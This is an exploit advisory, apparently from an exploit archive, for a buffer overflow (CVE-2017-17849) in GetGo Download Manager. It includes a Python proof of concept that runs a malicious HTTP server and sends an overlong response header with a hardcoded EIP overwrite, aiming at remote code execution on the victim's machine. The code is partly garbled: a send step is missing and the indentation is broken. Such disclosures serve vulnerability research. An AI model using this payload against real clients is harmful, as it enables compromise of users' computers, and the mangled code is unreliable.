GetGo Download Manager Buffer Overflow

GetGo Download Manager version suffers from a buffer overflow vulnerability.

MD5 | f7ccc852513bb0a9f11ee82f7f107cd1

# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager
# CVE: CVE-2017-17849
# Date: 22-12-2017
# Tested on Windows 10 32 bits
# Exploit Author: Aloyce J. Makalanga
# Contact: <>
# Software Link: <>
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution

1. Description

A buffer overflow vulnerability in GetGo Download Manager and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response. To exploit this vulnerability, an attacker needs to issue a malicious-crafted payload in the HTTP Response Header. A successful attack could result in code execution on the victim computer.

2. Proof of Concept

def main():
host = ""
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
print "\n[+] Listening on %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

evilbuffer = "A" * 4105
hardCodedEIP= "\x69\x9E\x45\x76" #This is a hardcoded EIP just for demo :). As you can see on the screenshot, we hit a breakpoint, right here on this EIP. Do you see our stack!!! You need to change this.
pads = "C"*(6000 - len(evilbuffer + hardCodedEIP))
payload = evilbuffer + hardCodedEIP + pads

buffer = "HTTP/1.1 200 " + payload + "\r\n"

print cl.recv(1000)
print "[+] Sending buffer: OK\n"


if __name__ == '__main__':
import socket
from time import sleep

3. Solution:
No solution as of yet.

Related Posts